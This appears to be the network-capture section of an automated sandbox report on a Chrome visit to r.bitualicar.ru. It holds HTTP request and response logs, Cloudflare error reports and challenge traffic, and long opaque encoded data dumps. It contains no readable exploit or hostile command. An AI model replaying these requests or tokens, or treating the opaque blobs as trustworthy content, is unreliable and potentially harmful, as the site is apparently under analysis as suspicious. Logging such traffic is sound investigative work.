                                                                    2025-01-15 21:50:15 UTC1369INData Raw: 34 77 4f 31 64 6e 5a 6d 4e 4a 51 7a 6f 72 61 53 74 50 58 32 42 49 55 32 64 6f 5a 47 45 76 53 6d 5a 63 57 6c 5a 47 61 6d 6c 54 4f 32 2b 43 58 31 52 63 59 56 6c 6c 66 58 5a 68 54 57 78 6c 65 33 43 53 54 57 75 4a 6a 5a 4b 4f 5a 5a 5a 33 6c 58 71 51 62 4a 71 44 59 58 56 62 65 35 71 66 6b 35 53 64 6c 35 5a 36 70 4b 35 39 62 6d 71 6a 66 32 31 70 67 33 65 55 71 6e 6d 58 6c 4c 4f 39 6b 4d 47 54 67 4a 57 6e 6b 36 57 65 76 70 6d 4a 69 36 2b 74 71 61 69 68 76 4c 2f 56 30 4b 47 73 74 74 6e 44 30 4e 65 73 72 4d 44 69 75 39 53 36 77 4d 58 6c 30 75 4c 47 34 4c 66 61 75 73 6a 69 76 72 48 45 72 72 37 49 36 39 62 52 74 76 54 6e 2f 73 62 55 32 67 44 64 76 2b 41 46 42 2f 62 6f 43 67 62 6b 35 41 77 4a 44 2b 67 51 44 78 50 73 46 41 34 58 38 42 67 55 47 2f 51 63 46 78 2f 34 49
                                                                    Data Ascii: 4wO1dnZmNJQzoraStPX2BIU2doZGEvSmZcWlZGamlTO2+CX1RcYVllfXZhTWxle3CSTWuJjZKOZZZ3lXqQbJqDYXVbe5qfk5Sdl5Z6pK59bmqjf21pg3eUqnmXlLO9kMGTgJWnk6WevpmJi6+tqaihvL/V0KGsttnD0NesrMDiu9S6wMXl0uLG4LfausjivrHErr7I69bRtvTn/sbU2gDdv+AFB/boCgbk5AwJD+gQDxPsFA4X8BgUG/QcFx/4I
                                                                    2025-01-15 21:50:15 UTC1369INData Raw: 70 4f 6c 78 57 56 6c 68 6a 5a 6b 42 44 63 55 6b 7a 54 6d 68 72 55 46 70 33 52 30 6c 61 56 48 6b 36 51 54 78 64 5a 49 43 48 69 47 68 65 53 48 70 72 59 6f 5a 35 61 59 78 66 68 6b 74 65 56 4a 5a 68 68 5a 4a 57 5a 59 39 35 6f 5a 4a 32 67 48 4b 4f 70 49 2b 62 66 48 32 43 71 61 56 34 66 4b 53 71 73 4a 53 69 72 5a 57 41 73 72 43 58 75 71 36 32 6d 70 69 79 75 70 57 63 74 72 36 59 6f 37 2b 43 6f 4c 76 49 78 35 66 4c 79 73 58 44 6a 4d 71 53 6c 73 76 47 31 38 69 77 72 4c 43 77 6c 39 76 4e 73 73 75 74 73 2b 47 6e 34 72 76 43 70 4f 61 72 77 71 66 63 38 74 37 68 34 65 6a 53 35 76 6a 4e 73 65 69 33 72 37 7a 71 41 62 7a 37 31 63 53 37 31 67 4d 46 34 39 33 37 33 4c 2f 58 2b 4f 38 53 35 4e 44 52 37 76 66 6d 35 4e 6e 55 2b 2b 76 79 42 2f 34 56 36 64 38 46 33 4f 55 56 43 52
                                                                    Data Ascii: pOlxWVlhjZkBDcUkzTmhrUFp3R0laVHk6QTxdZICHiGheSHprYoZ5aYxfhkteVJZhhZJWZY95oZJ2gHKOpI+bfH2CqaV4fKSqsJSirZWAsrCXuq62mpiyupWctr6Yo7+CoLvIx5fLysXDjMqSlsvG18iwrLCwl9vNssuts+Gn4rvCpOarwqfc8t7h4ejS5vjNsei3r7zqAbz71cS71gMF49373L/X+O8S5NDR7vfm5NnU++vyB/4V6d8F3OUVCR
                                                                    2025-01-15 21:50:15 UTC1369INData Raw: 55 48 46 70 54 45 78 7a 62 33 5a 51 64 33 4a 36 56 48 74 78 56 45 70 2f 58 46 35 44 55 48 39 50 55 55 4a 2f 64 56 5a 6a 62 48 65 4c 54 59 5a 64 69 5a 4e 6b 6c 34 74 77 61 48 57 58 62 6d 78 35 6d 32 70 77 66 5a 2b 50 5a 58 39 78 6d 58 65 6f 71 57 53 72 71 32 2b 6b 73 71 71 79 74 49 32 34 62 72 57 35 65 6f 79 75 6d 72 52 38 6a 35 47 31 6c 36 32 64 77 5a 76 49 76 61 6d 72 72 59 6d 71 6e 70 47 4d 70 5a 44 43 72 4e 65 32 77 70 62 4a 73 71 71 2b 73 63 48 5a 7a 63 79 39 33 36 57 6d 76 4c 32 6b 76 4e 54 47 32 36 66 52 32 39 36 77 71 37 53 2b 74 50 48 54 75 72 58 6c 38 75 66 38 30 66 66 50 39 2b 33 77 77 2f 6a 65 76 38 51 4e 42 4f 6e 69 36 77 45 4d 2f 50 77 56 31 63 38 43 39 78 55 57 44 75 67 48 32 78 2f 65 36 2f 77 43 45 51 48 76 2b 68 51 71 36 41 45 48 4c 41 48
                                                                    Data Ascii: UHFpTExzb3ZQd3J6VHtxVEp/XF5DUH9PUUJ/dVZjbHeLTYZdiZNkl4twaHWXbmx5m2pwfZ+PZX9xmXeoqWSrq2+ksqqytI24brW5eoyumrR8j5G1l62dwZvIvamrrYmqnpGMpZDCrNe2wpbJsqq+scHZzcy936WmvL2kvNTG26fR296wq7S+tPHTurXl8uf80ffP9+3ww/jev8QNBOni6wEM/PwV1c8C9xUWDugH2x/e6/wCEQHv+hQq6AEHLAH
                                                                    2025-01-15 21:50:15 UTC1369INData Raw: 45 4a 75 54 6a 68 58 62 47 39 2f 61 49 41 35 4f 32 78 55 4e 33 46 35 53 48 4a 59 68 54 36 4b 58 6b 56 4e 5a 48 75 49 54 49 56 4d 67 30 70 35 6a 6f 6d 49 63 5a 4e 77 65 48 74 76 67 33 32 62 6c 4a 2b 6c 59 57 46 30 6f 34 42 33 69 61 4e 38 71 36 31 78 5a 34 43 54 6a 36 57 37 69 4c 61 53 75 4c 47 38 76 70 75 76 6f 33 32 64 6b 63 53 61 67 35 33 44 77 62 2b 4a 68 34 69 77 6e 71 75 6d 77 63 54 46 72 72 62 59 6d 37 6d 30 7a 62 2f 63 76 5a 79 34 75 65 57 30 73 71 61 71 36 4d 4b 35 79 36 33 46 75 65 58 30 79 38 6e 44 36 4d 76 4b 78 38 62 47 74 38 76 4b 79 67 50 50 7a 73 37 44 30 39 4c 53 2f 74 66 57 31 67 76 62 32 74 6f 4c 33 39 37 65 38 63 33 71 34 65 72 78 47 76 49 59 35 75 34 4a 44 53 48 7a 34 68 49 62 48 51 41 48 35 76 34 4f 2b 65 55 64 45 52 30 4b 4d 67 6f 77
                                                                    Data Ascii: EJuTjhXbG9/aIA5O2xUN3F5SHJYhT6KXkVNZHuITIVMg0p5jomIcZNweHtvg32blJ+lYWF0o4B3iaN8q61xZ4CTj6W7iLaSuLG8vpuvo32dkcSag53Dwb+Jh4iwnqumwcTFrrbYm7m0zb/cvZy4ueW0sqaq6MK5y63FueX0y8nD6MvKx8bGt8vKygPPzs7D09LS/tfW1gvb2toL397e8c3q4erxGvIY5u4JDSHz4hIbHQAH5v4O+eUdER0KMgow
                                                                    2025-01-15 21:50:15 UTC1369INData Raw: 31 6f 65 6a 4b 42 54 6e 35 42 66 59 56 38 56 6d 57 41 53 6e 39 66 69 6c 70 2f 6b 48 31 2b 66 48 43 50 59 34 57 42 68 30 31 74 6a 70 52 65 66 34 74 62 62 70 6c 74 6c 49 47 5a 5a 5a 2b 44 5a 5a 78 2f 67 6f 4b 6e 67 4a 43 6f 70 4b 61 55 62 72 4a 31 71 6e 75 76 75 71 42 37 71 72 53 79 6e 70 71 6e 66 63 4b 6d 71 70 36 64 6c 37 2b 73 77 34 75 67 30 34 62 47 77 4c 4b 7a 78 36 32 34 74 4a 69 35 30 37 2f 41 32 4d 36 77 34 64 47 79 35 39 62 66 33 2b 54 68 76 71 72 65 71 2f 44 66 35 2f 44 4d 30 38 58 69 75 73 50 53 75 4c 44 65 33 66 7a 36 30 50 62 64 39 4f 62 52 35 66 75 39 35 2b 6e 70 2b 67 4d 54 38 64 48 6d 41 67 62 32 35 39 49 44 46 42 67 47 36 68 59 63 49 67 41 65 48 52 4c 30 46 69 62 38 41 78 67 43 49 4f 54 34 49 65 6b 78 35 54 55 73 4e 67 30 59 45 6a 55 4d 46
                                                                    Data Ascii: 1oejKBTn5BfYV8VmWASn9filp/kH1+fHCPY4WBh01tjpRef4tbbpltlIGZZZ+DZZx/goKngJCopKaUbrJ1qnuvuqB7qrSynpqnfcKmqp6dl7+sw4ug04bGwLKzx624tJi507/A2M6w4dGy59bf3+Thvqreq/Df5/DM08XiusPSuLDe3fz60Pbd9ObR5fu95+np+gMT8dHmAgb259IDFBgG6hYcIgAeHRL0Fib8AxgCIOT4Iekx5TUsNg0YEjUMF
                                                                    2025-01-15 21:50:15 UTC1369INData Raw: 2f 54 6c 52 68 67 33 52 59 5a 59 64 71 58 47 6d 4c 61 6d 42 74 6a 70 42 6b 63 5a 4b 53 67 6d 31 70 69 33 4a 77 65 56 79 53 65 47 32 6a 6d 48 61 70 69 4b 6c 7a 71 33 36 74 66 6e 74 36 72 47 6d 50 6c 61 75 4c 67 35 47 70 6a 34 57 46 74 5a 4f 4b 72 38 43 56 78 4a 53 36 70 35 4f 52 68 37 50 41 76 49 69 75 69 63 43 36 6d 36 57 4f 6f 74 69 58 79 37 69 62 31 70 61 32 6d 39 71 66 74 75 44 51 33 73 53 66 70 71 4f 2b 36 64 57 6e 71 36 7a 42 34 73 75 7a 38 4e 44 6e 73 2f 4f 79 79 76 4c 4c 2b 62 44 37 32 4f 6e 75 34 37 37 58 42 38 54 31 33 77 67 46 2b 66 59 45 7a 77 62 49 36 75 7a 64 37 67 50 75 39 67 6b 59 39 51 2f 38 30 42 2f 65 36 2f 6b 43 45 51 44 6a 2b 68 51 71 36 67 45 48 4c 41 50 72 44 54 45 76 49 78 55 32 4c 68 45 52 4f 44 51 37 46 54 77 33 50 78 6c 41 4e 68
                                                                    Data Ascii: /TlRhg3RYZYdqXGmLamBtjpBkcZKSgm1pi3JweVySeG2jmHapiKlzq36tfnt6rGmPlauLg5Gpj4WFtZOKr8CVxJS6p5ORh7PAvIiuicC6m6WOotiXy7ib1pa2m9qftuDQ3sSfpqO+6dWnq6zB4suz8NDns/OyyvLL+bD72Onu477XB8T13wgF+fYEzwbI6uzd7gPu9gkY9Q/80B/e6/kCEQDj+hQq6gEHLAPrDTEvIxU2LhERODQ7FTw3PxlANh
                                                                    2025-01-15 21:50:15 UTC1369INData Raw: 65 57 61 4f 65 6d 5a 68 53 56 2b 4a 6b 47 2b 51 68 47 79 5a 67 34 71 53 56 6e 71 52 67 4a 6c 73 6e 70 71 64 64 35 65 65 6c 48 69 6b 69 32 32 6b 6a 5a 32 79 69 4a 79 45 62 71 6d 50 70 70 4b 4f 6b 6f 53 38 73 4a 74 33 75 4a 57 62 70 4b 58 42 66 58 71 2b 71 34 47 67 69 63 6a 41 75 4b 36 63 6e 4b 44 54 69 4c 65 55 71 36 65 38 31 63 61 63 79 38 33 55 72 4c 2f 45 34 37 76 65 74 72 6e 55 78 62 72 43 32 4d 33 4e 35 4d 76 54 77 71 33 31 38 75 72 4b 35 2b 79 32 37 37 44 77 38 4e 62 38 7a 39 37 63 33 67 66 30 34 63 50 2b 34 65 66 64 43 73 66 65 37 39 33 55 39 68 63 4a 45 78 50 37 46 67 59 4a 46 77 6a 75 44 75 4c 7a 46 67 59 54 39 2b 63 43 47 77 76 30 4a 4f 63 45 44 42 77 62 41 79 58 39 45 41 67 44 38 44 72 37 4e 78 45 73 43 2f 59 30 39 44 55 31 47 30 45 55 49 79 45
                                                                    Data Ascii: eWaOemZhSV+JkG+QhGyZg4qSVnqRgJlsnpqdd5eelHiki22kjZ2yiJyEbqmPppKOkoS8sJt3uJWbpKXBfXq+q4GgicjAuK6cnKDTiLeUq6e81cacy83UrL/E47vetrnUxbrC2M3N5MvTwq318urK5+y277Dw8Nb8z97c3gf04cP+4efdCsfe793U9hcJExP7FgYJFwjuDuLzFgYT9+cCGwv0JOcEDBwbAyX9EAgD8Dr7NxEsC/Y09DU1G0EUIyE
                                                                    2025-01-15 21:50:15 UTC1369INData Raw: 6d 52 54 58 47 4b 57 5a 59 79 4b 57 6d 2b 64 64 56 64 78 61 6d 42 72 64 32 36 42 6e 58 31 30 65 6f 74 2f 68 5a 74 38 68 49 39 38 63 49 5a 2f 6b 57 36 4c 67 61 75 69 6a 70 47 7a 73 59 78 79 6d 4d 47 4f 6d 4a 71 77 6c 70 4f 52 6c 59 75 69 71 63 65 4d 69 4b 32 75 6d 38 57 73 6f 34 2b 77 30 71 33 47 33 62 69 72 6e 74 36 78 76 39 4f 77 34 75 54 69 76 4e 62 72 73 2b 76 4c 78 63 6d 6d 77 36 6e 79 38 63 6d 2b 78 4e 69 78 7a 62 71 36 31 37 79 2b 2f 73 33 66 39 4e 41 44 41 39 49 45 39 73 49 45 42 75 49 46 38 4d 6e 79 42 66 50 4e 34 67 55 49 43 78 50 56 42 68 44 75 2b 2f 73 69 33 4e 2f 38 37 68 63 58 4a 41 72 32 35 53 77 73 47 69 30 4e 35 2b 6f 42 48 68 4d 79 4b 41 34 48 46 42 54 7a 45 7a 76 2b 46 77 38 55 49 41 49 5a 2f 44 70 4a 48 30 67 59 50 52 38 4b 48 42 73 62
                                                                    Data Ascii: mRTXGKWZYyKWm+ddVdxamBrd26BnX10eot/hZt8hI98cIZ/kW6LgauijpGzsYxymMGOmJqwlpORlYuiqceMiK2um8Wso4+w0q3G3birnt6xv9Ow4uTivNbrs+vLxcmmw6ny8cm+xNixzbq617y+/s3f9NADA9IE9sIEBuIF8MnyBfPN4gUICxPVBhDu+/si3N/87hcXJAr25SwsGi0N5+oBHhMyKA4HFBTzEzv+Fw8UIAIZ/DpJH0gYPR8KHBsb


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    20192.168.2.84974135.190.80.14434836C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2025-01-15 21:50:14 UTC532OUTOPTIONS /report/v4?s=tVdO1wjIvtScIyPqcAdcVd9vYWRCll2pZWUyzKb8JzQ7RJd0m%2Fe4SC4lLYJAf96ojd0utNG6LYsmArISY6fonxozflMfIvLZADtb9vIBWcJIBNqTaFHpVUX%2FsDnyeA%3D%3D HTTP/1.1
                                                                    Host: a.nel.cloudflare.com
                                                                    Connection: keep-alive
                                                                    Origin: https://r.bitualicar.ru
                                                                    Access-Control-Request-Method: POST
                                                                    Access-Control-Request-Headers: content-type
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    2025-01-15 21:50:15 UTC336INHTTP/1.1 200 OK
                                                                    Content-Length: 0
                                                                    access-control-max-age: 86400
                                                                    access-control-allow-methods: POST, OPTIONS
                                                                    access-control-allow-origin: *
                                                                    access-control-allow-headers: content-type, content-length
                                                                    date: Wed, 15 Jan 2025 21:50:14 GMT
                                                                    Via: 1.1 google
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Connection: close


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    21192.168.2.84974335.190.80.14434836C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2025-01-15 21:50:15 UTC474OUTPOST /report/v4?s=tVdO1wjIvtScIyPqcAdcVd9vYWRCll2pZWUyzKb8JzQ7RJd0m%2Fe4SC4lLYJAf96ojd0utNG6LYsmArISY6fonxozflMfIvLZADtb9vIBWcJIBNqTaFHpVUX%2FsDnyeA%3D%3D HTTP/1.1
                                                                    Host: a.nel.cloudflare.com
                                                                    Connection: keep-alive
                                                                    Content-Length: 426
                                                                    Content-Type: application/reports+json
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    2025-01-15 21:50:15 UTC426OUTData Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 31 32 31 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 72 2e 62 69 74 75 61 6c 69 63 61 72 2e 72 75 2f 32 51 35 57 78 45 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 30 34 2e 32 31 2e 38 36 2e 39 31 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22
                                                                    Data Ascii: [{"age":0,"body":{"elapsed_time":121,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://r.bitualicar.ru/2Q5WxE/","sampling_fraction":1.0,"server_ip":"104.21.86.91","status_code":404,"type":"http.error"},"type":"network-error","
                                                                    2025-01-15 21:50:15 UTC168INHTTP/1.1 200 OK
                                                                    Content-Length: 0
                                                                    date: Wed, 15 Jan 2025 21:50:15 GMT
                                                                    Via: 1.1 google
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Connection: close


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    22192.168.2.849745104.18.95.414434836C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2025-01-15 21:50:16 UTC598OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/587605322:1736976641:hzSxMwNdKMvcs0n6J28XPhW8UvVhUfeqYsOGCs5a83Y/90291484da19c332/_SX7z.KCPU2XGGiOnMLS_Lppm3kR8Be8CF6Dp.QkJ_E-1736977813-1.1.1.1-Uj4fzoUrhuK3Sl.q1E2rsXgH8pmEEE06uw2Ire.ToEP2lXvUgKfDCFKrrfsra6uT HTTP/1.1
                                                                    Host: challenges.cloudflare.com
                                                                    Connection: keep-alive
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                    Accept: */*
                                                                    Sec-Fetch-Site: none
                                                                    Sec-Fetch-Mode: cors
                                                                    Sec-Fetch-Dest: empty
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    2025-01-15 21:50:16 UTC442INHTTP/1.1 400 Bad Request
                                                                    Date: Wed, 15 Jan 2025 21:50:16 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 14
                                                                    Connection: close
                                                                    cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                    cf-chl-out: ll4taFvyLFOiwH/LGZOR2qi2IMdSSvLi0SwlFD6rmW28ySq9nnPfVgbx0+3fI2uKlteTH5UIjoWMYqmB+tfPPA==$gWTJ3AeJhDDtRH73ZxK+FA==
                                                                    Server: cloudflare
                                                                    CF-RAY: 9029149bdbcc32e4-EWR
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    2025-01-15 21:50:16 UTC14INData Raw: 7b 22 65 72 72 22 3a 31 30 30 32 33 30 7d
                                                                    Data Ascii: {"err":100230}


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    23192.168.2.849746104.18.94.414434836C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2025-01-15 21:50:16 UTC811OUTGET /cdn-cgi/challenge-platform/h/b/pat/90291484da19c332/1736977815027/e9acd9776db8af061e63561248b6ab76ea6837c01ef68085ad9c2eeed95e0306/2q1Yjtdn1go6iXd HTTP/1.1
                                                                    Host: challenges.cloudflare.com
                                                                    Connection: keep-alive
                                                                    Cache-Control: max-age=0
                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                    sec-ch-ua-mobile: ?0
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                    sec-ch-ua-platform: "Windows"
                                                                    Accept: */*
                                                                    Sec-Fetch-Site: same-origin
                                                                    Sec-Fetch-Mode: cors
                                                                    Sec-Fetch-Dest: empty
                                                                    Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/bip52/0x4AAAAAAA5Dtl6jm2_BdC5F/auto/fbE/normal/auto/
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    2025-01-15 21:50:17 UTC143INHTTP/1.1 401 Unauthorized
                                                                    Date: Wed, 15 Jan 2025 21:50:17 GMT
                                                                    Content-Type: text/plain; charset=utf-8
                                                                    Content-Length: 1
                                                                    Connection: close
                                                                    2025-01-15 21:50:17 UTC2015INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 36 61 7a 5a 64 32 32 34 72 77 59 65 59 31 59 53 53 4c 61 72 64 75 70 6f 4e 38 41 65 39 6f 43 46 72 5a 77 75 37 74 6c 65 41 77 59 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d
                                                                    Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20g6azZd224rwYeY1YSSLardupoN8Ae9oCFrZwu7tleAwYAGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
                                                                    2025-01-15 21:50:17 UTC1INData Raw: 4a
                                                                    Data Ascii: J


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    24192.168.2.849747104.18.94.414434836C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2025-01-15 21:50:17 UTC782OUTGET /cdn-cgi/challenge-platform/h/b/i/90291484da19c332/1736977815028/06i_wUjDLHdc2b4 HTTP/1.1
                                                                    Host: challenges.cloudflare.com
                                                                    Connection: keep-alive
                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                    sec-ch-ua-mobile: ?0
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                    sec-ch-ua-platform: "Windows"
                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                    Sec-Fetch-Site: same-origin
                                                                    Sec-Fetch-Mode: no-cors
                                                                    Sec-Fetch-Dest: image
                                                                    Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/bip52/0x4AAAAAAA5Dtl6jm2_BdC5F/auto/fbE/normal/auto/
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    2025-01-15 21:50:17 UTC200INHTTP/1.1 200 OK
                                                                    Date: Wed, 15 Jan 2025 21:50:17 GMT
                                                                    Content-Type: image/png
                                                                    Content-Length: 61
                                                                    Connection: close
                                                                    Server: cloudflare
                                                                    CF-RAY: 902914a0c93872c2-EWR
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    2025-01-15 21:50:17 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 3b 00 00 00 2e 08 02 00 00 00 19 5c f6 cc 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                    Data Ascii: PNGIHDR;.\IDAT$IENDB`


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    25192.168.2.849748104.18.95.414434836C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2025-01-15 21:50:18 UTC428OUTGET /cdn-cgi/challenge-platform/h/b/i/90291484da19c332/1736977815028/06i_wUjDLHdc2b4 HTTP/1.1
                                                                    Host: challenges.cloudflare.com
                                                                    Connection: keep-alive
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                    Accept: */*
                                                                    Sec-Fetch-Site: none
                                                                    Sec-Fetch-Mode: cors
                                                                    Sec-Fetch-Dest: empty
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    2025-01-15 21:50:18 UTC200INHTTP/1.1 200 OK
                                                                    Date: Wed, 15 Jan 2025 21:50:18 GMT
                                                                    Content-Type: image/png
                                                                    Content-Length: 61
                                                                    Connection: close
                                                                    Server: cloudflare
                                                                    CF-RAY: 902914a498a8de95-EWR
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    2025-01-15 21:50:18 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 3b 00 00 00 2e 08 02 00 00 00 19 5c f6 cc 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                    Data Ascii: PNGIHDR;.\IDAT$IENDB`


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    26192.168.2.849749104.18.94.414434836C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2025-01-15 21:50:18 UTC1171OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/587605322:1736976641:hzSxMwNdKMvcs0n6J28XPhW8UvVhUfeqYsOGCs5a83Y/90291484da19c332/_SX7z.KCPU2XGGiOnMLS_Lppm3kR8Be8CF6Dp.QkJ_E-1736977813-1.1.1.1-Uj4fzoUrhuK3Sl.q1E2rsXgH8pmEEE06uw2Ire.ToEP2lXvUgKfDCFKrrfsra6uT HTTP/1.1
                                                                    Host: challenges.cloudflare.com
                                                                    Connection: keep-alive
                                                                    Content-Length: 32217
                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                    Content-type: application/x-www-form-urlencoded
                                                                    CF-Chl-RetryAttempt: 0
                                                                    sec-ch-ua-mobile: ?0
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                    CF-Challenge: _SX7z.KCPU2XGGiOnMLS_Lppm3kR8Be8CF6Dp.QkJ_E-1736977813-1.1.1.1-Uj4fzoUrhuK3Sl.q1E2rsXgH8pmEEE06uw2Ire.ToEP2lXvUgKfDCFKrrfsra6uT
                                                                    sec-ch-ua-platform: "Windows"
                                                                    Accept: */*
                                                                    Origin: https://challenges.cloudflare.com
                                                                    Sec-Fetch-Site: same-origin
                                                                    Sec-Fetch-Mode: cors
                                                                    Sec-Fetch-Dest: empty
                                                                    Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/bip52/0x4AAAAAAA5Dtl6jm2_BdC5F/auto/fbE/normal/auto/
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
